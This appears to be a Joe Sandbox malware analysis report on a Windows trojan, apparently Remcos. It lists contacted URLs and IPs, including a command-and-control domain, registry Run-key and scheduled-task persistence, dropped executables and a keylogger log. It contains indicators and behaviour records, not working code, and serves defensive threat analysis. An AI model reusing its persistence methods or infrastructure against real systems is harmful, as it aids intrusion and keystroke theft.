                                                                      http://geoplugin.net/ccrdlld.exe, 00000006.00000003.2854551296.0000000009AA4000.00000004.00000001.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045600619.0000000009AAB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://geoplugin.net/json.gp/Cccrdlld.exe, 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, ccrdlld.exe, 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://remote-app-switcher.prod-east.frontend.public.atl-paas.netcsc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netcsc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://stackoverflow.com/q/11564914/23354;csc.exe, 00000003.00000002.4047594349.0000000009530000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.00000000082D5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://stackoverflow.com/q/2152978/23354csc.exe, 00000003.00000002.4047594349.0000000009530000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.00000000082D5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://geoplugin.net/json.gpOccrdlld.exe, 00000006.00000003.2854551296.0000000009A7F000.00000004.00000001.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045600619.0000000009A8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://bbuseruploads.s3.amazonawscsc.exe, 00000003.00000002.4046058134.0000000006E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://cdn.cookielaw.org/csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://aui-cdn.atlassian.com/csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://geoplugin.net/json.gpn.net/son.gp5BCA4A7416Bccrdlld.exe, 00000006.00000003.2854551296.0000000009A7F000.00000004.00000001.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045600619.0000000009A8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://remote-app-switcher.stg-east.frontend.public.atl-paas.netcsc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-csc.exe, 00000003.00000002.4046058134.0000000006DD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://s3-w.us-east-1.amazonaws.comcsc.exe, 00000003.00000002.4046058134.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecsc.exe, 00000003.00000002.4046058134.0000000006D21000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4046058134.0000000006FB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://bitbucket.orgcsc.exe, 00000003.00000002.4046058134.0000000006D21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://bbuseruploads.s3.amazonaws.comcsc.exe, 00000003.00000002.4046058134.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://geoplugin.net/json.gpdJccrdlld.exe, 00000006.00000003.2854551296.0000000009A7F000.00000004.00000001.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045600619.0000000009A8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.hdsentinel.comcsc.exe, 00000003.00000003.2577032423.00000000080B7000.00000004.00000800.00020000.00000000.sdmp, ccrdlld.exe, 00000005.00000000.2580957765.000000000051C000.00000020.00000001.01000000.00000008.sdmp, ccrdlld.exe, 00000005.00000002.2860397581.00000000135BE000.00000004.00001000.00020000.00000000.sdmp, ccrdlld.exe.3.drfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown

                                                                                                          World Map of Contacted IPs

                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs

                                                                                                          Public IPs

                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          3.5.24.44
                                                                                                          		s3-w.us-east-1.amazonaws.comUnited States
                                                                                                          		14618AMAZON-AESUSfalse
                                                                                                          181.131.217.244
                                                                                                          		navegacionseguracol24vip.orgColombia
                                                                                                          		13489EPMTelecomunicacionesSAESPCOfalse
                                                                                                          185.166.143.49
                                                                                                          		bitbucket.orgGermany
                                                                                                          		16509AMAZON-02USfalse
                                                                                                          178.237.33.50
                                                                                                          		geoplugin.netNetherlands
                                                                                                          		8455ATOM86-ASATOM86NLfalse

                                                                                                          General Information

                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                          Analysis ID:1573906
                                                                                                          Start date and time:2024-12-12 18:00:28 +01:00
                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                          Overall analysis duration:0h 11m 9s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                          Run name:Run with higher sleep bypass
                                                                                                          Number of analysed new started processes analysed:7
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Sample name:4JwhvqLe8n.exe
                                                                                                          renamed because original name is a hash value
                                                                                                          Original Sample Name:66e6c38dc2c5e1dc03209e8f876d546c94a1b806c6e02c3b33f5e523eb3fdff9.exe
                                                                                                          Detection:MAL
                                                                                                          Classification:mal100.troj.spyw.expl.evad.winEXE@6/5@5/4
                                                                                                          EGA Information:
                                                                                                          • Successful, ratio: 66.7%
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 75%
                                                                                                          • Number of executed functions: 222
                                                                                                          • Number of non-executed functions: 59
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .exe
                                                                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                                          Warnings

                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197, 52.149.20.212
                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                          • Execution Graph export aborted for target ccrdlld.exe, PID 7120 because there are no executed function
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                          • VT rate limit hit for: 4JwhvqLe8n.exe

                                                                                                          Simulations

                                                                                                          Behavior and APIs

                                                                                                          TimeTypeDescription
                                                                                                          18:01:55AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OrionLegacyCLI C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe
                                                                                                          18:02:04AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OrionLegacyCLI C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe
                                                                                                          18:02:12Task SchedulerRun new task: ccrdlld path: C:\Users\user\AppData\Local\Temp\ccrdlld.exe
                                                                                                          18:02:42AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run HardDiskSentinea C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exe
                                                                                                          18:02:50AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run HardDiskSentinea C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exe

                                                                                                          Joe Sandbox View / Context

                                                                                                          IPs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          181.131.217.244fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                            hoTwj68T1D.exeGet hashmaliciousUnknownBrowse
                                                                                                              IXCbn4ZcdS.exeGet hashmaliciousRemcosBrowse
                                                                                                                d7gXUPUl38.exeGet hashmaliciousRemcosBrowse
                                                                                                                  fIPSLgT0lO.exeGet hashmaliciousUnknownBrowse
                                                                                                                    3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                                                                      ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                        pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                          sXpIsdpkzy.exeGet hashmaliciousRemcosBrowse
                                                                                                                            185.166.143.49http://jasonj002.bitbucket.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                            • jasonj002.bitbucket.io/
                                                                                                                            178.237.33.50fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • geoplugin.net/json.gp
                                                                                                                            IXCbn4ZcdS.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • geoplugin.net/json.gp
                                                                                                                            d7gXUPUl38.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • geoplugin.net/json.gp
                                                                                                                            3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • geoplugin.net/json.gp
                                                                                                                            ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • geoplugin.net/json.gp
                                                                                                                            pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • geoplugin.net/json.gp
                                                                                                                            sXpIsdpkzy.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • geoplugin.net/json.gp
                                                                                                                            VwiELrqQjD.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • geoplugin.net/json.gp
                                                                                                                            SYSnyI8qDu.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • geoplugin.net/json.gp
                                                                                                                            Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                            • geoplugin.net/json.gp

                                                                                                                            Domains

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            navegacionseguracol24vip.orghoTwj68T1D.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            IXCbn4ZcdS.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            d7gXUPUl38.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            3XSXmrEOw7.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            s3-w.us-east-1.amazonaws.comfIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 52.217.129.233
                                                                                                                            3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 54.231.203.105
                                                                                                                            ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 52.217.118.249
                                                                                                                            pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 54.231.193.17
                                                                                                                            hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 3.5.25.23
                                                                                                                            ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 3.5.29.178
                                                                                                                            3XSXmrEOw7.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 3.5.28.146
                                                                                                                            financial_policy_December 10, 2024.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                                            • 54.231.205.1
                                                                                                                            https://login.hr-internal.co/27553be9ed867726?l=50Get hashmaliciousUnknownBrowse
                                                                                                                            • 3.5.28.204
                                                                                                                            http://prntbl.concejomunicipaldechinu.gov.coGet hashmaliciousUnknownBrowse
                                                                                                                            • 16.15.193.78
                                                                                                                            bitbucket.orgfIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 185.166.143.50
                                                                                                                            hoTwj68T1D.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 185.166.143.49
                                                                                                                            fIPSLgT0lO.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 185.166.143.49
                                                                                                                            3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 185.166.143.48
                                                                                                                            ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 185.166.143.48
                                                                                                                            pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 185.166.143.50
                                                                                                                            hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 185.166.143.49
                                                                                                                            x4fDy1muYs.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 185.166.143.48
                                                                                                                            ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 185.166.143.50
                                                                                                                            geoplugin.netfIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            IXCbn4ZcdS.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            d7gXUPUl38.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            sXpIsdpkzy.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            VwiELrqQjD.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            SYSnyI8qDu.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                            • 178.237.33.50

                                                                                                                            ASNs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            AMAZON-AESUShCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 3.5.25.23
                                                                                                                            http://setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.comGet hashmaliciousUnknownBrowse
                                                                                                                            • 44.221.84.105
                                                                                                                            phish_alert_sp2_2.0.0.0 (1).emlGet hashmaliciousUnknownBrowse
                                                                                                                            • 54.146.214.76
                                                                                                                            https://cdn.iobit.com/dl/driver_booster_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 35.174.38.64
                                                                                                                            jew.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 54.204.149.181
                                                                                                                            jew.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 34.199.141.162
                                                                                                                            427c7bdc-ea02-97de-e5ef-a2c58c2d0a48.emlGet hashmaliciousUnknownBrowse
                                                                                                                            • 54.224.241.105
                                                                                                                            Non_disclosure_agreement.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 34.196.82.111
                                                                                                                            https://feji.us/m266heGet hashmaliciousUnknownBrowse
                                                                                                                            • 44.216.196.47
                                                                                                                            jew.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 54.157.203.139
                                                                                                                            EPMTelecomunicacionesSAESPCOfIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            hoTwj68T1D.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            IXCbn4ZcdS.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            d7gXUPUl38.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            fIPSLgT0lO.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            sXpIsdpkzy.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            AMAZON-02USigmbio.pdfGet hashmaliciousUnknownBrowse
                                                                                                                            • 52.219.93.250
                                                                                                                            full.exeGet hashmaliciousQuasarBrowse
                                                                                                                            • 18.231.236.52
                                                                                                                            fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 185.166.143.50
                                                                                                                            hoTwj68T1D.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 185.166.143.49
                                                                                                                            fIPSLgT0lO.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 185.166.143.49
                                                                                                                            3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 185.166.143.48
                                                                                                                            ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 185.166.143.48
                                                                                                                            pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 54.231.193.17
                                                                                                                            hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 185.166.143.49
                                                                                                                            ATOM86-ASATOM86NLfIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            IXCbn4ZcdS.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            d7gXUPUl38.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            sXpIsdpkzy.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            VwiELrqQjD.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            SYSnyI8qDu.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                            • 178.237.33.50

                                                                                                                            JA3 Fingerprints

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0efull.exeGet hashmaliciousQuasarBrowse
                                                                                                                            • 3.5.24.44
                                                                                                                            • 185.166.143.49
                                                                                                                            fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 3.5.24.44
                                                                                                                            • 185.166.143.49
                                                                                                                            hoTwj68T1D.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 3.5.24.44
                                                                                                                            • 185.166.143.49
                                                                                                                            fIPSLgT0lO.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 3.5.24.44
                                                                                                                            • 185.166.143.49
                                                                                                                            3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 3.5.24.44
                                                                                                                            • 185.166.143.49
                                                                                                                            ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 3.5.24.44
                                                                                                                            • 185.166.143.49
                                                                                                                            pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 3.5.24.44
                                                                                                                            • 185.166.143.49
                                                                                                                            hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 3.5.24.44
                                                                                                                            • 185.166.143.49
                                                                                                                            x4fDy1muYs.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 3.5.24.44
                                                                                                                            • 185.166.143.49

                                                                                                                            Dropped Files

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exefIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                                              3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                                                                                ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                                  pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                                    hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                                                                      C:\Users\user\AppData\Local\Temp\ccrdlld.exefIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                                                        3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                                                                                          ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                                            pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                                              hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\ProgramData\fdgfghgfhg\logs.dat

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\ccrdlld.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):488
                                                                                                                                                Entropy (8bit):3.256825663620976
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:6lbUKKecmlbUrAbWFe5UlbtlbjbWFe5UlbWjclbWJbW+:66ccm6r0WqUzxWqU5kW+
                                                                                                                                                MD5:3DC0C40BAF064DBD3074360F17C95B64
                                                                                                                                                SHA1:7DC25E99284D47E05B94A769D009D64D18AB5506
                                                                                                                                                SHA-256:29F2E67B4D15A01A7B0A8790A4B14A12EACB793F7E768AA9BEB4E756F493E993
                                                                                                                                                SHA-512:1028E01978B2E9F881347D6BE4D59347A6473EFF062E305977A989AA927472E9A14B417A27ED73D66B251328839E8575A48AAE36F5808D3DAF266CAE1869A729
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:....[.2.0.2.4./.1.2./.1.2. .1.2.:.0.2.:.3.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.1.2./.1.2. .1.2.:.0.2.:.3.6. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.1.2./.1.2. .1.2.:.0.2.:.4.2. .R.u.n.].........[.2.0.2.4./.1.2./.1.2. .1.2.:.0.2.:.4.5. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.1.2./.1.2. .1.2.:.0.2.:.5.1. .R.u.n.].........[.2.0.2.4./.1.2./.1.2. .1.2.:.0.2.:.5.1. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\ccrdlld.exe
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):963
                                                                                                                                                Entropy (8bit):5.018384957371898
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:tkluWJmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkD:qlupdVauKyGX85jvXhNlT3/7CcVKWro
                                                                                                                                                MD5:0F26B79167E7BB356D7AB35E01B90A0E
                                                                                                                                                SHA1:4655C51903490C3536D4A5D0885D17267526E56C
                                                                                                                                                SHA-256:0E7A0C4D81A5F0AB568FCF592D369FF0007E1D5DF1130327353347C79BD2BCA6
                                                                                                                                                SHA-512:B7A8B80DCC0463F5C89DC6F1D8F89E7C570494B9A55A9A05B278371ABDE2D74D3F0A76163A836E8FD7AF94F37A167B9807C441A1C19EF4F04408B509D0204376
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                                                C:\Users\user\AppData\Local\Temp\ccrdlld.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):4054528
                                                                                                                                                Entropy (8bit):6.41931526899004
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:98304:swsFCTOMRebywOIYAXu14+MFL3MrI+rtZg+VRWKldQwsRwRHa0eQkxHodWYPWIRL:Psukx/cRAVyoqjU9sVK+
                                                                                                                                                MD5:27650AFE28BA588C759ADE95BF403833
                                                                                                                                                SHA1:6D3D03096CEE42FC07300FB0946EC878161DF8A5
                                                                                                                                                SHA-256:CA84EC6D70351B003D3CACB9F81BE030CC9DE7AC267CCE718173D4F42CBA2966
                                                                                                                                                SHA-512:767CEB499DDA76E63F9ECEAA2AA2940D377E70A2F1B8E74DE72126977C96B32E151BFF1FB88A3199167E16977B641583F8E8EA0F764A35214F6BC9A2D2814FDC
                                                                                                                                                Malicious:true
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: fIPSLgT0lO.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: 3XSXmrEOw7.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: ozfqy8Ms6t.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: pPLwX9wSrD.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: hCJ8gK9kNn.exe, Detection: malicious, Browse
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................. .........H. .......!...@...........................[..................@...........................p=.n5....?.p.....................................................=.....................................................CODE......!....... ................. ..`DATA..........!....... .............@...BSS...........!.......!..................idata...@...p=..6....!.............@....tls..........=.......!..................rdata... ....=.......!.............@..P.rsrc...p.....?.......!.............@..P........................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\ccrdlld.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
